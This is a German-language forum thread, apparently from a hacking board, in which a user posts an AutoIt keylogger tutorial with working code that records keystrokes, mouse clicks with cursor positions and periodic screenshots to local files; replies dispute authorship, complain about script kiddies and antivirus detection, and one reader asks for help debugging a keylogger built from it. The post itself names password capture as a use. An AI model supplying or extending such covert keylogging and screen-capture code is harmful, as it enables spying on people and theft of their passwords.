[AutoIt] Key Logger Tutorial

[V!ruS]

Key Logger Tutorial mit AutoIt

Vorweg möchte ich noch ein paar Dinge sagen...
Ich zeige in diesem Turorial nicht wie man sich einen fertigen Key Logger baut, sondern lediglich die Funtionen die ihr benötigt! In eine GUI einfügen denke ich sollte jeder können der sich mit AutoIt schonmal näher befasst hat.
Ich werde auch keine Links für Compiler etc. posten, AutoIt Compiler wie Scite findet man bei Google sehr schnell! Ihr müsst euch für dieses Tutorial quasi alle nötigen Programme selbst besorgen, aber für dieses Tutorial ist zum glück kein Compiler zwingend!
AutoIt ist noch eine sehr neue Scriptsprache deswegen wird dieser Key Logger von der Qualität anderer abweichen!
Sämtliche Kommentare wie "Den kann man doch nicht gebrauchen" oder ähnliches könnt ihr euch sparen, denn ich mache das Tutorial freiwillig für die, die AutoIt lernen bzw. können und etwas dazulernen wollen, auf Kommentare werde ich deshalb auch nicht weiter eingehen!

Was ist ein Keylogger?

Key Logger sind Programme die, die Tastatur überwachen und Tastendrücke überprüfen und ihre Ergebnisse in eine Datei schreiben. Im Laufe der Zeit wurden auch Key Logger gebaut die Screenshots machen können oder Mausclicks aufzeichneten. Heutzutage sind Key Logger auch mit FTP Upload Funtkionen und vielem mehr ausgestattet sie dienen weitesgehend dazu den eigenen Computer zu überwachen oder Passwörter herauszufinden, was jedoch auch sehr schnell mit einer Anzeige, des 0pfers beendet werden kann, denn Key Logger sind nur für die Überwachung des eigenen Heim Computers oder eines eigenen Firmen Computers o.ä. erlaubt!

Was ist AutoIt?

AutoIt ist eine Sriptsprache die noch sehr neu ist, sie ist in C++ geschrieben und bietet dem Heim- oder Hobby- Scripter viele Möglichkeiten zur Automatisierung vieler Dinge am Computer, dazu ist AutoIt auch noch hervorragend für Anfänger geeignet, denn hier kann man auch mit ein paar Wochen übung stolze Werke meistern, jedoch werden AutoIt Porgramme meist von Virenprogrammen und Firewalls blockiert, da sie als Viren erkannt werden, dies ist eine schwere Last der Scriptsprache AutoIt.

Tutorial

In diesem Tutorial zeige ich euch wie ihr Screenshots, Mausaufzeichnungen und Tastendrücke aufzeichnen könnt, jedoch keine Uploadfunktionen für FTP oder E-Mail Funktionen!

Als allererstes beginnen wir einmal mit dem wichtigsten Teil, der Tastaturaugzeichnung, hierfügr benötigen wir den _IsPressed Befehl, dieser kann für uns Maus- und Tastaturereignisse aufzeichnen.
Für diesen Code müsst ihr die Misc.au3 in der ersten Zeile includen!

_IsPressed:
Der _IsPressed() - Befehl ist für einen AutoIt Keylogger der wichtigste Befehl er überprüft, mithilfe einer If-Schleife, ob eine Taste gedrückt wurde. In der Klammer hinter dem Befehl müssen folgendes enthalten sein:
("Hex-Code eurer Taste(Hex-Code des Zeichens der Taste)","Die User32 Dll bei Windows, bei Linux wäre das eine andere!")

Hier ist einmal ein kleiner Code wie ihr die Taste "1" aufzeichnen könnt:

Code:

#Include <Misc.au3>

_Key1()

Func _Key1()
   While 1
      If _IsPressed("31",DllOpen("user32.dll")) Then
         FileWrite("Log.txt"," 1")
         Sleep(100)
      EndIf
      Sleep(5)
   WEnd
EndFunc

So in diesem Code seht ihr das der _IsPressed befehl bei einem Keylogger immer mit einer If-Schleife überprüft wird. Wenn die Taste "1" gedrückt wird, wird in die Datei "Log.txt" eine 1 geschrieben. Falls nicht läuft die While-Schleife in der das ganze im 5Milisekundentakt überprüft wird, weiter.

Wie füge ich dort jetzt noch einen Key ein? Das ist ganz einfach mit einer erweiterung der If-Schleife bei einer weiteren Taste sähe das ganze nun so aus:

Code:

#Include <Misc.au3>

_Key1and2()

Func _Key1and2()
   While 1
      If _IsPressed("31",DllOpen("user32.dll")) Then
         FileWrite("Log.txt"," 1")
         Sleep(100)
      ElseIf _IsPressed("32",DllOpen("user32.dll")) Then
         FileWrite("Log.txt"," 2")
         Sleep(120)
      EndIf
      Sleep(5)
   WEnd
EndFunc

Die Funktion _Key1and2() könnt ihr natürlich nach eurem belieben nach nennen! So wie ihr seht ist in der If-Schleife nun eine ElseIf zu finden anders als in C\C++ ein weiteres If. Der rest unter dem ElseIf entspricht dem ersten If!
Wenn ihr nun noch einen Key überprüfen wollt fügt einfach ein weiteres ElseIf mit eurem Key ein!

Ihr könnt eure Aufzeichnungen natürlich auch in einem Log oder einer Ini speichern, eigentlich in jeder Datei, ich bevorzuge jedoch den FileWrite() Befehl, denn dort kann man die aufgezeichneten Keys am besten lesen.

Damit wäre der Teil Tastaturaufzeichnung fertig!

Als nächstes kommt die Mausaufzeichnung, hier ist die Überprüfung eines Tastendrucks gleich wie bei der Tastaturaufzeichnung. Der Hex-Code für die linke Maustaste: "01", der für die rechte: "02". Nun wollen wir aber nicht nur einen Mausdruck aufzeichnen sondern gleich noch die Position des Coursers zur derzeitigen Zeit, dafür benutzen wir den Befehl MouseGetPos(), mit einer Variable kombiniert kann man mit ihm Kinderleicht die Position des Mauszeigers herausfinden.
Hier ein Code wie man die Position des Mauszeigers herausfindet:

Code:

#include <Misc.au3>
#include <File.au3>

_Pos()

Func _Pos()
While 1
    $Pos = MouseGetPos()
    If _IsPressed("01") Then
         _FileWriteLog("MouseLog.log","'left:'" & $Pos[0] & ":" & $Pos[1])
         Sleep(120)
    EndIf
WEnd
EndFunc

So hier findet ihr auch noch den Befehl _FileWriteLog, dieser Befehl ist am übersichtlichsten bei einer Mausaufzeichnung, denn er schreibt immer wieder in eine neue Reihe + Datum! Aber nun zu MauseGetPos() wie ihr seht haben wir nun die Variable "$Pos" vor MouseGetPos() um die Daten vom MouseGetPos() Befehl richtig zu entnehmen müssen wir $Pos[0] für die X-Position und $Pos[1] für die Y-Position benutzen, das seht ihr ja auch in dem _FileWriteLog Befehl!

So eine weitere Maustaste wie bei der Tastatur einfügen! Das war dann auch schon die Mausaufzeichnung.

Nun kommen wir zum spannendsten Teil, die Screenshots, das ist leichter als gedacht denn wir brauchen nur ein paar Befehle die sich in der ScreenCapture.au3 befinden und zwar wären das:
_ScreenCapture_Capture und _ScreenCapture_SaveImage

_ScreenCapture_Capture:
Macht einen Screenshot vom aktuellen Desktop. Bei unserem Keylogger können die Klammern leer bleiben!

_ScreenCapture_SaveImage.
Speichert den aktuellen Capture ab.

Code eines Screen Captures:

Code:

#include <ScreenCapture.au3>

Global $Nr = 0

_Cap()

Func _Cap()
	While 1
		$Nr = $Nr+1
		Sleep(10000)
		$Cap= _ScreenCapture_Capture()
		_ScreenCapture_SaveImage("Screen" & $Nr & ".gif",$Cap)
	WEnd
EndFunc

So hier haben wir _ScreenCapture_Capture() mit einer Variable zugewiesen und sie $Cap genannt. _ScreenCapture_SaveImage("Screen" & $Nr & ".gif",$Cap), hier wird ein Screenshot mit der $Nr des aktuellen While-Schleifen durchlaufs gemacht und als .Gif gespeichert(Sehr wenig Speicherverbrauch) hier finden wir auch die Variable $Cap sie ist dafür da das der Speicherbefehl weiss welchen Capture er abspechern soll. Hier wird auch nicht mehr die Misc.au3 benötigt, da wir nun auch keine Tasten mehr abfragen wollen!

$Nr = $Nr +1 usw. muss ich glaube ich nicht erklären der Sleep Befehl ist der Abstandhalter zwischen den Screenshots hier könnt ihr natürlich auch eine genaue Zeitangabe mit einer If-Schleife oder sonstigem reinmachen, das bleibt euch überlassen!

Das war auch schon mein Tutorial!

Viel spass und Erfolg beim Coden!
V!ruS

[$ubZer0]

Dein tut ? den namen drunterschreiben macht den text nicht zu deinem geistigen eigentum, das tut is alt und nicht von dir n44p!

[inyourface]

Schick geklaut
Kannst mir auch erklären wie man mit AutoIT -> Windows API coded? :>
danke

[Dexx]

er hat einen erklärt wie das geht und das ist sinn eines tutorials.
und wenn man z.b. ein tut macht wie man sich bei funpic regisriert und dann ne webspell page on stellt. ist es dann acuh nciht sein eigenes tut weil einen funpic nicht gehört bzw. webspell und sonstiges?

[$ubZer0]

er hat einen erklärt wie das geht und das ist sinn eines tutorials.
und wenn man z.b. ein tut macht wie man sich bei funpic regisriert und dann ne webspell page on stellt. ist es dann acuh nciht sein eigenes tut weil einen funpic nicht gehört bzw. webspell und sonstiges?

was issen das bitte für ne logik oO

man hätte schreiben können, ich hab hier was nützliches gefunden was bestimmt jemand brauchen kann etc.

[V!ruS]

Oo okay ich habe mir Zeit genommen das Tut zu schreiben und Ich habe es nicht geschrieben um mir jetzt anzuhören zu müssen, dass es kopiert sei! Ich habe jeden einzelnen Satz davon selbst geschrieben! Schicke mir doch bitte mal die Seite oder das Dokument aus dem Ich es kopiert habe!
Das Tut kann garnicht alt sein da Ich es an dem Tage erst geschrieben habe als Ich es hier reingestellt habe, kommt evtl. nen bisschen neid bei dir auf? Oder was ist mit dir los, bei der Anmeldung zu diesem Forum stand doch ganz klar, dass man das mindestalter von 12 erreicht haben muss, was bei dir wohl nicht der Fall sein sollte...

[$ubZer0]

edited... will nich streiten.

es gibt ein offizielles autoit keylogger tut in verschiedenen versionen und ich dachte das wäre dieses, ich hab jetzt nicht nachgeschaut aber ich geh mald avon aus dass du es nicht geklaut hast wenn du schons agst dass du es an dem tag gebaut hast,

was ich jedoch schade finde ist dass jetzt wieder en haufen scriptkiddies
einen neuen weg gefunden haben ne geniale sache wie autoit3
für so ne scheisse zu missbrauchen.

[th3flood]

Code:

aber leider werden die meisten autoit programme von einem av immer erkannt, egal was es ist, auch wenn es nur ein harmloser code ist, min. 1-3
av's meckern immer rum

da hast du recht, man kann eigentlich richtig tolle sachen damit coden, die auch nützlich sind aber leider wurde autoit schon zu oft für "malware" etc missbraucht und deshalb meckern einige AVs fast immer rum.

[Betonamujin]

Danke erstmal
nice tut
ich hab jetzt letzens mit dieser keyliste einen keylogger programmiert.
bei mir ist das Problem das oft beim aufzeichnen wenn ich z.B. HalloWelt schreibe
zeichnet er folgendes in die log.txt
haallowwlt
es tauchen also Wörter doppelt auf und einige gar nicht?
wie kann man sowas verhindern?

[Betonamujin]

Keiner der mir weiterhelfen kann? :/